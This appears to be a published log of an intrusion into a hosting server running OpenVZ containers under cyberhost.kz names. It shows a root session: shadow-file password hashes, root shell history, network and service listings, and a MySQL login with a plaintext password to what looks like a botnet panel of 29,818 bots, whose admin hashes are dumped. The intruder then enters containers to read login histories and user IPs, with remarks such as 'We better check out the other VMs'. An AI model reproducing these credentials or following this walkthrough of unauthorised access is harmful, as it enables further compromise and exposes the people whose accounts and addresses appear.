nobody:*:15105:0:99999:7:::
nscd:!!:15105:0:99999:7:::
vcsa:!!:15105:0:99999:7:::
rpc:!!:15105:0:99999:7:::
mailnull:!!:15105:0:99999:7:::
smmsp:!!:15105:0:99999:7:::
pcap:!!:15105:0:99999:7:::
dbus:!!:15105:0:99999:7:::
haldaemon:!!:15105:0:99999:7:::
avahi:!!:15105:0:99999:7:::
sshd:!!:15105:0:99999:7:::
avahi-autoipd:!!:15105:0:99999:7:::
rpcuser:!!:15105:0:99999:7:::
nfsnobody:!!:15105:0:99999:7:::
apache:!!:15106::::::
lxlabs:!!:15106:0:99999:7:::
mysql:!!:15106::::::
truevm:$1$Cp/eTTFF$nqVR5/rgSvqs51UIuz6Et.:15251:0:99999:7:::
stansecuvm:$1$o3WpZh6S$mPXWzQjMEL5zIkwBFhGGD1:15112:0:99999:7:::
bnetvm:$1$V.AhGgm3$o4ZdgfznQ3sE2.1KJa0qx/:15115:0:99999:7:::
scriptstvm:$1$W5AWFCAH$dbJijEizlB92aFTY7HCDX.:15116:0:99999:7:::
spikevm:$1$m1v5zxhw$xs3WszkyroI/FWi8djdo4.:15132:0:99999:7:::
xtothecvm:$1$D9ZLxI1c$Sopa3HPCOBTRC4c6KBtCD/:15134:0:99999:7:::
y00vm:$1$k1GqAtHB$mdsd292s..nL/v6YG5Tfz0:15138:0:99999:7:::
iodasvm:$1$6laui1W/$L/evF8MACUrrJ.AUbBC2E.:15138:0:99999:7:::
rootvm:$1$0rDTGCQP$1OK0z1ldsptZuWD9YJmfM.:15201:0:99999:7:::
stansocksvm:$1$KbcEDmUM$Idr7lpMI/JOYU0pY3uafF/:15201:0:99999:7:::
bdgatevm:$1$0TIPnn9P$.IoVhoG0DYMW0gUfzUqnH/:15208:0:99999:7:::
fredvm:$1$QKXpFmyk$tNA8I7G6ZCc5eKbuHyHTr/:15222:0:99999:7:::
spike80vm:$1$Ir2OIga1$Xfp.9xdaXFWaaxc18Q/hR/:15224:0:99999:7:::
ixdevm:$1$xK6jSstU$cOuss77pdmE6YfUmBL2pa1:15226:0:99999:7:::
wohovm:$1$SRfLhbuK$gz/o3IYB/WJdHKGPhll6z0:15233:0:99999:7:::
sethvm:$1$aal3q4fB$bf2DeWIqbsZ/IVjBGhepv0:15250:0:99999:7:::

# pwd
/root

# alias ls="ls -la"

# ls
total 341288
drwxr-x---  4 root root      4096 Oct  9 08:20 .
drwxr-xr-x 25 root root      4096 Oct 10 05:48 ..
-rw-------  1 root root      6069 Oct  9 08:37 .bash_history
-rw-r--r--  1 root root        24 Jan  6  2007 .bash_logout
-rw-r--r--  1 root root       191 Jan  6  2007 .bash_profile
-rw-r--r--  1 root root       176 Jan  6  2007 .bashrc
-rw-r--r--  1 root root       100 Jan  6  2007 .cshrc
drwxr-xr-x 16 root root      4096 May 10  2009 .etc
-rw-------  1 root root        41 Oct  9 07:59 .lesshst
-rw-r--r--  1 root root       129 Jan  6  2007 .tcshrc
-rw-r--r--  1 root root 134392688 May 12 02:28 1000mb.bin
-rw-r--r--  1 root root 135565568 May 12 05:16 1000mb.bin.1
-rw-r--r--  1 root root  30797000 May 12 02:23 100mb.test
-rw-r--r--  1 root root  48135408 May 12 02:55 100mb.test.1
-rw-------  1 root root      1171 May 11 09:46 anaconda-ks.cfg
-rw-r--r--  1 root root       719 May 12 01:03 hypervm-install-master.sh
-rw-r--r--  1 root root     14502 May 11 09:46 install.log
-rw-r--r--  1 root root      2886 May 11 09:46 install.log.syslog
drwxr-xr-x  7 root root      4096 May 12 01:04 program-install
-rw-r--r--  1 root root     68091 Jun  4  2009 program-install.zip

# cat .bash_history 
yum install openssh-server net-snmp
nano /etc/snmp/snmpd.conf 
/etc/init.d/snmpd restart
exit
top
setenforce 0
wget http://download.lxcenter.org/download/hypervm/production/hypervm-install-master.sh
sh ./hypervm-install-master.sh --virtualization-type=xen/openvz/NON
sh ./hypervm-install-master.sh --virtualization-type=openvz
nano /etc/grub.conf
shutdown -r now
wget http://mirror.leaseweb.com/speedtest/1000mb.bin
top
service hypervm
service hypervm start
yum install iptraf
iptraf
nano /etc/resolv.conf
nano /etc/resolv.conf
ifconfig
tracert 
tracert 193.107.16.183
193.107.16.82
tracert 193.107.16.183
wget http://cachefly.cachefly.net/100mb.test
wget http://cachefly.cacwget http://cachefly.cachefly.net/100mb.testhefly.net/100mb.test
get http://cachefly.cachefly.net/1000mb.test 
wget http://cachefly.cachefly.net/1000mb.test 
wget http://cachefly.cachefly.net/100mb.test 
wget http://mirror.leaseweb.com/speedtest/1000mb.bin
lsmod |grep -i ipt_conntrack
/sbin/modprobe ipt_owner
/sbin/modprobe ipt_recent
/sbin/modprobe ipt_tos
/sbin/modprobe ipt_TOS
/sbin/modprobe ipt_LOG
/sbin/modprobe ip_conntrack
/sbin/modprobe ipt_limit
/sbin/modprobe ipt_multiport
/sbin/modprobe iptable_filter
/sbin/modprobe iptable_mangle
/sbin/modprobe iptable_TCPMSS
/sbin/modprobe iptable_tcpmss
/sbin/modprobe ipt_tcpmss
/sbin/modprobe ipt_ttl
/sbin/modprobe ipt_length
/sbin/modprobe ipt_state
/sbin/modprobe ipt_nat
/sbin/modprobe ip_nat_ftp
nano /etc/sysconfig/iptables-config
nano /etc/sysconfig/vz
service iptables restart
service vz start
service vz stop
service iptables restart
service vz start
iptables -A INPUT -p tcp --dport 80 -j DROP
iptables -A INPUT -p tcp --dport 3306 -j DROP
ping www.besthotshop.info  
ping www.ddstores.com 
modprobe ipt_limit
nano /etc/sysconfig/iptables-config
nano /etc/sysconfig/vz
iptables restart
/etc/init.d/iptables restart
vzctl set 110 --iptables "ipt_REJECT ipt_tos ipt_TOS ipt_LOG ip_conntrack ipt_limit ipt_multiport iptable_filter iptable_mangle ipt_TCPMSS ipt_tcpmss ipt_ttl ipt_length ipt_state iptable_nat ip_nat_ftp --save




save
-- save
vzctl set 110 --iptables iptable_nat --save
vzctl stop 110
vzctl set 110 --iptables iptable_nat --save
vzctl set 110 --iptables iptable_nat ipt_limit --save
vzctl set 110 --iptables ipt_limit --save
vzctl restart 110
vzctl stop 110
nano /etc/sysconfig/vz
service vz restart
vzctl set 110 --numiptent 2000 --save
vzctl stop 110
vzctl set 110 --iptables
vzctl set 110 --iptables ipt_REJECT ipt_tos ipt_TOS ipt_LOG ip_conntrack ipt_limit ipt_multiport iptable_filter iptable_mangle ipt_TCPMSS ipt_tcpmss ipt_ttl ipt_length ipt_state iptable_nat ip_nat_ftp --save
vzctl set 110 --iptables
vzctl set 110 --iptables -h
vzctl set 110 -h
vzctl set 110 --help
modprobe ipt_limit

ipt_REJECT ipt_tos ipt_TOS ipt_LOG ip_conntrack ipt_limit ipt_multiport iptable_filter iptable_mangle ipt_TCPMSS ipt_tcpmss ipt_ttl ipt_l
iptables -A INPUT -p tcp --dport 80 -m connlimit --connlimit-above 10 -j DROP
iptables --flush
service vz restart
iptables -A INPUT -p tcp --dport 80 -m connlimit --connlimit-above 8 -j DROP
sdasdasdasd
modprobe ipt_connlimit
nano /etc/sysconfig/vz
nano /etc/sysconfig/iptables-config
/etc/init.d/iptables restart
service vz restart
shutdown -r now
service vz restart
lsmod | grep ipt
modprobe -v xt_connlimit
echo 2262144 > /proc/sys/net/ipv4/ip_conntrack_max
echo 22262144 > /proc/sys/net/ipv4/ip_conntrack_max
dmeg
dmesg
iptables --flush
service iptables restart
iptraf
modprobe xt_state
sysctl net.ipv4.netfilter.ip_conntrack_max
wc -l /proc/net/ip_conntrack
sysctl -
sysctl -po
sysctl -p
nano /etc/sysctl.conf
sysctl -p
nano /etc/sysctl.conf
sysctl -p
sysctl -p | grep mem
sysctl -p | grep mem
yum install htop
system-config-network
ifconfig
ping 193.107.17.66 
ping 193.107.17.67
iptables --flush
ping 193.107.17.80 
sysctl -p | grep mem
ping 193.107.17.66 
ping 193.107.17.80 
nano /etc/sysctl.conf
service network restart
ip route
ip route add 193.107.17.0/24 dev eth0 proto kernel scope link src 193.107.16.82
service network restart
service network restart
ip route
ip route add 193.107.17.0/24 dev eth0 proto kernel scope link src 193.107.17.66
ip route add 193.107.17.0/24 dev eth0 proto kernel scope link src 193.107.16.82
ip route
ip route add 193.107.17.80 dev venet0  scope link
ip route add 193.107.17.66 dev venet0  scope link
nano /etc/sysctl.conf
service sysctl restart
sysctl -p
sysctl -a 
ip route
ip route add 193.107.17.66 dev eth0  scope link
ip route add 193.107.17.67 dev eth0  scope link
ip rute
ip route
service network restart
ifup-local
ip route
ip route add 193.107.17.0/24 dev eth0
route add 193.107.17.0/24  netmask 255.255.255.0 dev eth1

ip route add 193.107.17.0/24 dev eth0 proto kernel scope link src 193.107.17.1
ip route add 193.107.17.0/24 dev eth0 proto kernel scope link src 193.107.17.66
ip route add 193.107.17.0/24 dev eth0 proto kernel scope link src 193.107.17.68
ip route add 193.107.17.0/24 dev eth0 proto kernel scope link src 193.107.16.82
route
redhat-config-network
network-admin
route add default2 gw 193.107.17.1 eth0
route add default gw 193.107.17.1 eth0
route
service httpd stop
route add default gw 193.107.17.1 eth0
route add default2 gw 193.107.17.1 eth0
ip route add 193.107.17.0/24 dev eth0 proto kernel scope link src 193.107.17.68
ip route add 193.107.17.0/24 dev eth0
ifconfig
route add default gw 193.107.17.1 eth0
ip route add 193.107.17.0/24 dev eth0
service network restart
ip route add 193.107.17.0/24 dev eth0
route add default gw 193.107.17.1 eth0

ip route add 193.107.17.0/24 dev venet0
netstat
paswd
passwd
modprobe tun
vzctl set 310 --devices c:10:200:rw --save
vzctl set 310 --capability net_admin:on --save
modprobe ipt_mark
modprobe ipt_MARK
modprobe tun
vzctl stop 310
vzctl set 310 --capability net_admin:on --save
vzctl set 310 --devices c:10:200:rw --save
vzctl start 310
vzctl exec 310 mkdir -p /dev/net
vzctl exec 310 mknod /dev/net/tun c 10 200
vzctl exec 310 chmod 600 /dev/net/tun
df
top
su bnetvm
iptables -A INPUT -p tcp --destination-port 80 -j DROP
top
hitop
htop
ftop
iftop
netstat

# ifconfig
eth0      Link encap:Ethernet  HWaddr E0:CB:4E:4F:A7:D8  
          inet addr:193.107.16.82  Bcast:193.107.16.255  Mask:255.255.255.0
          inet6 addr: fe80::e2cb:4eff:fe4f:a7d8/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:3764684 errors:0 dropped:0 overruns:0 frame:0
          TX packets:2963185 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:517778892 (493.7 MiB)  TX bytes:429952789 (410.0 MiB)
          Interrupt:90 Base address:0x2000 

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:3830 errors:0 dropped:0 overruns:0 frame:0
          TX packets:3830 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:257453 (251.4 KiB)  TX bytes:257453 (251.4 KiB)

venet0    Link encap:UNSPEC  HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00  
          UP BROADCAST POINTOPOINT RUNNING NOARP  MTU:1500  Metric:1
          RX packets:2952095 errors:0 dropped:0 overruns:0 frame:0
          TX packets:3188473 errors:0 dropped:313 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:387733783 (369.7 MiB)  TX bytes:408435813 (389.5 MiB)


# netstat -tulpn
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address               Foreign Address             State       PID/Program name   
tcp        0      0 0.0.0.0:110                 0.0.0.0:*                   LISTEN      9044/tcpserver      
tcp        0      0 0.0.0.0:7778                0.0.0.0:*                   LISTEN      338/kloxo.httpd     
tcp        0      0 127.0.0.1:7776              0.0.0.0:*                   LISTEN      22868/php           
tcp        0      0 0.0.0.0:143                 0.0.0.0:*                   LISTEN      9051/tcpserver      
tcp        0      0 0.0.0.0:995                 0.0.0.0:*                   LISTEN      8760/tcpserver      
tcp        0      0 0.0.0.0:993                 0.0.0.0:*                   LISTEN      6813/tcpserver      
tcp        0      0 0.0.0.0:7779                0.0.0.0:*                   LISTEN      744/php             
tcp        0      0 127.0.0.1:587               0.0.0.0:*                   LISTEN      31415/sendmail: MTA 
tcp        0      0 0.0.0.0:25                  0.0.0.0:*                   LISTEN      28959/xinetd        
tcp        0      0 127.0.0.1:953               0.0.0.0:*                   LISTEN      27340/named         
tcp        0      0 193.107.16.217:53           0.0.0.0:*                   LISTEN      21090/named         
tcp        0      0 127.0.0.1:53                0.0.0.0:*                   LISTEN      21090/named         
tcp        0      0 0.0.0.0:7777                0.0.0.0:*                   LISTEN      20789/kloxo.httpd   
tcp        0      0 0.0.0.0:21                  0.0.0.0:*                   LISTEN      12611/xinetd        
tcp        0      0 0.0.0.0:22                  0.0.0.0:*                   LISTEN      21054/sshd          
tcp        0      0 127.0.0.1:3306              0.0.0.0:*                   LISTEN      18864/mysqld        
tcp        0      0 0.0.0.0:80                  0.0.0.0:*                   LISTEN      2855/apache2        
tcp        0      0 193.107.17.80:53            0.0.0.0:*                   LISTEN      14937/named         
tcp        0      0 0.0.0.0:3306                0.0.0.0:*                   LISTEN      2255/mysqld         
tcp        0      0 193.107.17.81:53            0.0.0.0:*                   LISTEN      29195/named         
tcp        0      0 193.107.16.197:443          0.0.0.0:*                   LISTEN      19137/lighttpd      
tcp        0      0 0.0.0.0:55986               0.0.0.0:*                   LISTEN      350/perl            
tcp        0      0 0.0.0.0:65500               0.0.0.0:*                   LISTEN      22852/perl          
tcp        0      0 0.0.0.0:5544                0.0.0.0:*                   LISTEN      6594/sshd           
tcp        0      0 193.107.17.69:53            0.0.0.0:*                   LISTEN      24903/named         
tcp        0      0 193.107.16.184:53           0.0.0.0:*                   LISTEN      16961/named         
tcp        0      0 193.107.16.183:53           0.0.0.0:*                   LISTEN      24588/named         
tcp        0      0 127.0.0.1:25                0.0.0.0:*                   LISTEN      25293/sendmail: MTA 
tcp        0      0 0.0.0.0:111                 0.0.0.0:*                   LISTEN      6276/portmap        
tcp        0      0 193.107.16.196:53           0.0.0.0:*                   LISTEN      30862/named         
tcp        0      0 0.0.0.0:445                 0.0.0.0:*                   LISTEN      15210/smbd          
tcp        0      0 193.107.17.67:53            0.0.0.0:*                   LISTEN      25565/named         
tcp        0      0 193.107.16.81:53            0.0.0.0:*                   LISTEN      12513/named         
tcp        0      0 127.0.0.1:9000              0.0.0.0:*                   LISTEN      21079/php-fpm.conf) 
tcp        0      0 127.0.0.1:8886              0.0.0.0:*                   LISTEN      8978/php            
tcp        0      0 193.107.16.55:53            0.0.0.0:*                   LISTEN      8944/named          
tcp        0      0 0.0.0.0:8887                0.0.0.0:*                   LISTEN      7026/hypervm.httpd  
tcp        0      0 127.0.0.1:631               0.0.0.0:*                   LISTEN      6608/cupsd          
tcp        0      0 0.0.0.0:8888                0.0.0.0:*                   LISTEN      7026/hypervm.httpd  
tcp        0      0 193.107.17.83:53            0.0.0.0:*                   LISTEN      18447/named         
tcp        0      0 0.0.0.0:8889                0.0.0.0:*                   LISTEN      8978/php            
tcp        0      0 0.0.0.0:985                 0.0.0.0:*                   LISTEN      6315/rpc.statd      
tcp        0      0 193.107.17.68:53            0.0.0.0:*                   LISTEN      27340/named         
tcp        0      0 193.107.16.55:443           0.0.0.0:*                   LISTEN      16889/lighttpd      
tcp        0      0 127.0.0.1:2000              0.0.0.0:*                   LISTEN      25205/varnishd      
tcp        0      0 0.0.0.0:8080                0.0.0.0:*                   LISTEN      20954/nginx         
tcp        0      0 0.0.0.0:139                 0.0.0.0:*                   LISTEN      15210/smbd          
tcp        0      0 :::80                       :::*                        LISTEN      28969/httpd         
tcp        0      0 :::21                       :::*                        LISTEN      31096/proftpd: (acc 
tcp        0      0 ::1:953                     :::*                        LISTEN      27340/named         
tcp        0      0 :::22                       :::*                        LISTEN      21198/sshd          
tcp        0      0 :::443                      :::*                        LISTEN      2460/httpd          
tcp        0      0 :::5544                     :::*                        LISTEN      6594/sshd           
tcp        0      0 :::53                       :::*                        LISTEN      16961/named         
udp        0      0 0.0.0.0:111                 0.0.0.0:*                               6276/portmap        
udp        0      0 193.107.16.55:53            0.0.0.0:*                               8944/named          
udp        0      0 127.0.0.1:53                0.0.0.0:*                               8944/named          
udp        0      0 193.107.16.197:53           0.0.0.0:*                               15203/tinydns       
udp        0      0 193.107.16.81:53            0.0.0.0:*                               12513/named         
udp        0      0 127.0.0.1:53                0.0.0.0:*                               12513/named         
udp        0      0 193.107.16.184:53           0.0.0.0:*                               16961/named         
udp        0      0 127.0.0.1:53                0.0.0.0:*                               16961/named         
udp        0      0 193.107.17.80:53            0.0.0.0:*                               14937/named         
udp        0      0 127.0.0.1:53                0.0.0.0:*                               14937/named         
udp        0      0 193.107.17.83:53            0.0.0.0:*                               18447/named         
udp        0      0 127.0.0.1:53                0.0.0.0:*                               18447/named         
udp        0      0 193.107.16.184:137          0.0.0.0:*                               14895/nmbd          
udp        0      0 193.107.16.184:137          0.0.0.0:*                               14895/nmbd          
udp        0      0 0.0.0.0:137                 0.0.0.0:*                               14895/nmbd          
udp        0      0 193.107.16.184:138          0.0.0.0:*                               14895/nmbd          
udp        0      0 193.107.16.184:138          0.0.0.0:*                               14895/nmbd          
udp        0      0 0.0.0.0:138                 0.0.0.0:*                               14895/nmbd          
udp        0      0 193.107.16.217:53           0.0.0.0:*                               21090/named         
udp        0      0 127.0.0.1:53                0.0.0.0:*                               21090/named         
udp        0      0 193.107.16.183:53           0.0.0.0:*                               24588/named         
udp        0      0 127.0.0.1:53                0.0.0.0:*                               24588/named         
udp        0      0 193.107.17.69:53            0.0.0.0:*                               24903/named         
udp        0      0 127.0.0.1:53                0.0.0.0:*                               24903/named         
udp        0      0 193.107.17.67:53            0.0.0.0:*                               25565/named         
udp        0      0 127.0.0.1:53                0.0.0.0:*                               25565/named         
udp        0      0 193.107.17.68:53            0.0.0.0:*                               27340/named         
udp        0      0 127.0.0.1:53                0.0.0.0:*                               27340/named         
udp        0      0 193.107.17.81:53            0.0.0.0:*                               29195/named         
udp        0      0 127.0.0.1:53                0.0.0.0:*                               29195/named         
udp        0      0 193.107.16.196:53           0.0.0.0:*                               30862/named         
udp        0      0 127.0.0.1:53                0.0.0.0:*                               30862/named         
udp        0      0 0.0.0.0:631                 0.0.0.0:*                               6608/cupsd          
udp        0      0 0.0.0.0:979                 0.0.0.0:*                               6315/rpc.statd      
udp        0      0 0.0.0.0:982                 0.0.0.0:*                               6315/rpc.statd      
udp        0      0 0.0.0.0:10000               0.0.0.0:*                               22852/perl          
udp        0      0 0.0.0.0:10000               0.0.0.0:*                               350/perl            
udp        0      0 0.0.0.0:53957               0.0.0.0:*                               29116/avahi-daemon: 
udp        0      0 0.0.0.0:5353                0.0.0.0:*                               29116/avahi-daemon: 
udp        0      0 :::53                       :::*                                    16961/named         
udp        0      0 :::53                       :::*                                    24588/named         
udp        0      0 :::5353                     :::*                                    29116/avahi-daemon: 
udp        0      0 :::56885                    :::*                                    29116/avahi-daemon: 

# cd /home/

# ls
total 104
drwxr-xr-x 21 root        root        4096 Oct  3 08:21 .
drwxr-xr-x 25 root        root        4096 Oct 10 05:48 ..
drwx------  2 bdgatevm    bdgatevm    4096 Aug 22 05:35 bdgatevm
drwx------  2 bnetvm      bnetvm      4096 May 21 02:36 bnetvm
drwx------  2 fredvm      fredvm      4096 Sep  5 08:40 fredvm
drwxr-xr-x  2 root        root        4096 May 12 01:07 httpd
drwxr-xr-x  7 root        root        4096 Aug 22 06:08 hypervm
drwx------  2 iodasvm     iodasvm     4096 Jun 13 03:25 iodasvm
drwx------  2 ixdevm      ixdevm      4096 Sep  9 09:19 ixdevm
drwx------  2 lxlabs      lxlabs      4096 May 12 01:04 lxlabs
drwx------  2 rootvm      rootvm      4096 Aug 15 04:15 rootvm
drwx------  2 scriptstvm  scriptstvm  4096 May 22 02:41 scriptstvm
drwx------  2 sethvm      sethvm      4096 Oct  3 08:21 sethvm
drwx------  2 spike80vm   spike80vm   4096 Sep  7 01:32 spike80vm
drwx------  2 spikevm     spikevm     4096 Jun  7 09:21 spikevm
drwx------  2 stansecuvm  stansecuvm  4096 May 18 03:40 stansecuvm
drwx------  2 stansocksvm stansocksvm 4096 Aug 15 04:26 stansocksvm
drwx------  2 truevm      truevm      4096 May 16 06:29 truevm
drwx------  2 wohovm      wohovm      4096 Sep 16 03:03 wohovm
drwx------  2 xtothecvm   xtothecvm   4096 Jun  9 08:40 xtothecvm
drwx------  2 y00vm       y00vm       4096 Jun 13 03:02 y00vm

# du -h
20K	./ixdevm
20K	./scriptstvm
20K	./fredvm
20K	./rootvm
20K	./spikevm
20K	./stansecuvm
20K	./xtothecvm
20K	./iodasvm
20K	./bdgatevm
20K	./y00vm
20K	./stansocksvm
20K	./spike80vm
32K	./lxlabs
20K	./wohovm
8.0K	./httpd
20K	./sethvm
32K	./hypervm/xen/template
40K	./hypervm/xen
1.7M	./hypervm/selfbackup/self/__backup
1.7M	./hypervm/selfbackup/self
1.7M	./hypervm/selfbackup
4.0K	./hypervm/vps/fred.vm/__backup
8.0K	./hypervm/vps/fred.vm
12K	./hypervm/vps
16K	./hypervm/lxguard
8.0K	./hypervm/client/admin
16K	./hypervm/client
1.8M	./hypervm
20K	./bnetvm
20K	./truevm
2.2M	.

# mysql -u snap_db snap_db -pwBqGlNtjZ2m -h bgate.secure-host.in
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 717502
Server version: 5.0.92 Source distribution

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> SELECT COUNT(*) FROM list_bots;
+----------+
| COUNT(*) |
+----------+
|    29818 |
+----------+
1 row in set (0.00 sec)

mysql> select * from list_users;
+----+-------+----------------------------------+-------------+-------+-----+
| id | nick  | passwd                           | permissions | theme | lng |
+----+-------+----------------------------------+-------------+-------+-----+
|  1 | admin | 76a2173be6393254e72ffa4d6df1030a |         255 | dark  | en  |
|  2 | test  | 598d4c200461b81522a3328565c25f7c |         255 | dark  | en  |
+----+-------+----------------------------------+-------------+-------+-----+
2 rows in set (0.00 sec)
 
mysql> Ctrl-C -- exit!
Aborted

# 29818 bots here, not bad...^C
# 
# We better check out the other VMs

# vzlist
Warning: Unknown iptable module: ipt_connlimit, skipped
      CTID      NPROC STATUS    IP_ADDR         HOSTNAME
       130         64 running   193.107.16.55   true
       140         60 running   193.107.16.197  stansecu
       160         62 running   193.107.16.81   testing
       180         18 running   193.107.16.184  scriptst
       240         59 running   193.107.17.80   spike
       250         34 running   193.107.17.82   vps287.cyberhost.kz
       260         59 running   193.107.17.83   y00
       270         38 running   193.107.17.66   iodas
       300         34 running   193.107.16.217  Ro0t.cyberhost.kz
       310         23 running   193.107.16.183  stansocks
       340         56 running   193.107.17.69   badgate.cyberhost.kz
       350         59 running   193.107.17.67   fr3d.cyberhost.kz
       360         61 running   193.107.17.68   vps241.cyberhost.kz
       370         61 running   193.107.17.81   vps249.cyberhost.kz
       380         64 running   193.107.16.196  vps254.cyberhost.kz
       390         10 running   193.107.16.185  vps522.cyberhost.kz

# vzctl enter 130 
Warning: Unknown iptable module: ipt_connlimit, skipped
entered into CT 130

[root@true /]# last
reboot   system boot  2.6.18-238.9.1.e Mon Oct 10 13:48          (03:55)    
reboot   system boot  2.6.18-238.9.1.e Tue Oct  4 10:42         (6+01:17)   
root     pts/0        77-20-18-64-dyni Tue Oct  4 10:04 - down   (00:37)    
reboot   system boot  2.6.18-238.9.1.e Tue Oct  4 09:54          (00:47)    
root     pts/0        p5483a590.dip.t- Sat Oct  1 12:50 - 12:55  (00:05)    
root     pts/0        p5483a590.dip.t- Sat Oct  1 07:48 - 08:31  (00:43)    
reboot   system boot  2.6.18-238.9.1.e Tue Sep 27 14:19         (5+23:56)   
reboot   system boot  2.6.18-238.9.1.e Tue Sep 27 14:11          (00:08)    
reboot   system boot  2.6.18-238.9.1.e Tue Sep 27 14:10          (00:00)    
reboot   system boot  2.6.18-238.9.1.e Tue Sep 27 09:50          (04:19)    
reboot   system boot  2.6.18-238.9.1.e Mon Sep 26 15:23          (18:26)    
reboot   system boot  2.6.18-238.9.1.e Mon Sep 26 15:20          (00:01)    
reboot   system boot  2.6.18-238.9.1.e Mon Sep 26 15:19          (00:01)    
reboot   system boot  2.6.18-238.9.1.e Mon Sep 26 15:16          (00:01)    
reboot   system boot  2.6.18-238.9.1.e Mon Sep 26 15:05          (00:10)    
reboot   system boot  2.6.18-238.9.1.e Mon Sep 26 14:54          (00:10)    
reboot   system boot  2.6.18-238.9.1.e Mon Sep 26 14:52          (00:01)    
reboot   system boot  2.6.18-238.9.1.e Mon Sep 26 14:49          (00:02)    
root     pts/0        p5483d6ba.dip.t- Fri Sep 23 16:32 - 17:03  (00:31)    
root     pts/0        p5483d6ba.dip.t- Fri Sep 23 16:21 - 16:32  (00:10)    
reboot   system boot  2.6.18-238.9.1.e Thu Sep  1 11:18         (25+03:30)  
root     pts/0        p5483df28.dip.t- Thu Sep  1 10:49 - down   (00:29)    
reboot   system boot  2.6.18-238.9.1.e Thu Sep  1 09:58          (01:19)    
reboot   system boot  2.6.18-238.9.1.e Thu Sep  1 09:58          (00:00)    

[root@true /]# cd /home/

[root@true home]# ls -la
total 60
drwxr-xr-x 15 root              root     4096 Oct  1 12:50 .
drwxr-xr-x 23 root              root     4096 Oct 10 13:48 ..
drwx------  3 admin             admin    4096 Sep  1 11:01 admin
drwx------  2 axfrdns           axfrdns  4096 Sep  1 11:10 axfrdns
drwx------  2 dnscache          dnscache 4096 Sep  1 11:10 dnscache
drwx------  2 dnslog            dnslog   4096 Sep  1 11:10 dnslog
drwxr-xr-x  3 root              root     4096 Sep  1 11:12 httpd
drwxr-xr-x  3 root              root     4096 Oct  1 07:55 irc
drwxr-xr-x  6 root              root     4096 Sep  2 04:15 kloxo
drwxr-xr-x  3 root              root     4096 Sep  1 11:00 lxadmin
drwx------  2 lxlabs            lxlabs   4096 Sep  1 10:53 lxlabs
drwxr-xr-x  3 root              root     4096 Oct  1 12:52 mocks
drwx------  2 nouser            nogroup  4096 Sep  1 10:53 nouser
drwx------  2 tinydns           tinydns  4096 Sep  1 11:10 tinydns
drwxr-x---  5 true.cyberhost.kz apache   4096 Sep  2 04:04 true.cyberhost.kz

[root@true true.cyberhost.kz]# cd true.cyberhost.kz/

[root@true true.cyberhost.kz]# ls -la
total 36
drwxr-x---  5 true.cyberhost.kz apache            4096 Sep  2 04:04 .
drwxr-xr-x 15 root              root              4096 Oct  1 12:50 ..
-rw-r--r--  1 true.cyberhost.kz true.cyberhost.kz   33 Sep  1 11:12 .bash_logout
-rw-r--r--  1 true.cyberhost.kz true.cyberhost.kz  176 Sep  1 11:12 .bash_profile
-rw-r--r--  1 true.cyberhost.kz true.cyberhost.kz  124 Sep  1 11:12 .bashrc
drwxr-xr-x  2 true.cyberhost.kz true.cyberhost.kz 4096 Sep  1 11:12 kloxoscript
drwxr-xr-x  2 root              root              4096 Oct  5 05:02 __processed_stats
lrwxrwxrwx  1 root              root                42 Sep  1 11:12 public_html -> /home/true.cyberhost.kz/true.cyberhost.kz/
-rw-r--r--  1 true.cyberhost.kz true.cyberhost.kz   11 Sep  1 11:12 .qmail
drwxr-xr-x  5 true.cyberhost.kz apache            4096 Oct  4 10:31 true.cyberhost.kz

[root@true true.cyberhost.kz]# cd true.cyberhost.kz/

[root@true true.cyberhost.kz]# ls
Design  portokalli  wordpress
[root@true true.cyberhost.kz]# cd wordpress/

[root@true wordpress]# ls
index.php

[root@true wordpress]# cat index.php 
<h1><center>Visit CyberNetwork</h1><a href="http://www.cyberbase.us/">KLICK HIER!!!</a>

[root@true wordpress]# # nothing to see here

[root@true true.cyberhost.kz]# logout

exited from CT 130

# vzctl enter 140
Warning: Unknown iptable module: ipt_connlimit, skipped
entered into CT 140

[root@stansecu /]# last
reboot   system boot  2.6.18-238.9.1.e Mon Oct 10 13:48          (03:59)    
root     pts/0        p57b104ec.dip0.t Mon Oct 10 06:09 - 10:15  (04:06)    
root     pts/1        p57b10668.dip0.t Sun Oct  9 20:17 - 01:20  (05:02)    
root     pts/0        193.107.17.30    Sun Oct  9 20:05 - 20:30  (00:24)    
root     pts/0        193.107.17.30    Sun Oct  9 19:49 - 20:05  (00:16)    
root     pts/0        193.107.17.30    Fri Sep 30 16:00 - 21:16  (05:16)    
stanwww  pts/0        193.107.17.30    Fri Sep 30 15:59 - 15:59  (00:00)    
reboot   system boot  2.6.18-238.9.1.e Thu Aug 11 15:15         (59+20:45)  
reboot   system boot  2.6.18-238.9.1.e Wed Aug 10 09:44          (01:02)    
reboot   system boot  2.6.18-238.9.1.e Wed Aug 10 09:32          (01:14)    
reboot   system boot  2.6.18-238.9.1.e Wed Jul 13 17:11         (27+16:18)  
root     pts/0        193.107.16.213   Sun Jul 10 19:59 - 23:31  (03:32)    
root     pts/0        92.241.165.69    Fri Jul  1 11:24 - 18:41  (07:16)    
root     pts/0        92.241.165.69    Thu Jun 30 15:40 - 19:48  (04:07)    
root     pts/0        92.241.165.69    Tue Jun 28 18:52 - 18:52  (00:00)    
root     pts/0        92.241.165.69    Wed Jun 22 06:29 - 07:36  (01:07)    
root     pts/0        92.241.165.69    Mon Jun 20 07:41 - 08:24  (00:43)    
root     pts/0        92.241.165.69    Tue Jun 14 16:03 - 16:43  (00:39)    
root     pts/0        92.241.165.69    Mon Jun 13 11:27 - 18:21  (06:54)    
root     pts/0        92.241.165.69    Sat Jun 11 05:45 - 22:19  (16:33)    
root     pts/0        92.241.165.69    Mon May 30 12:58 - 13:01  (00:02)    
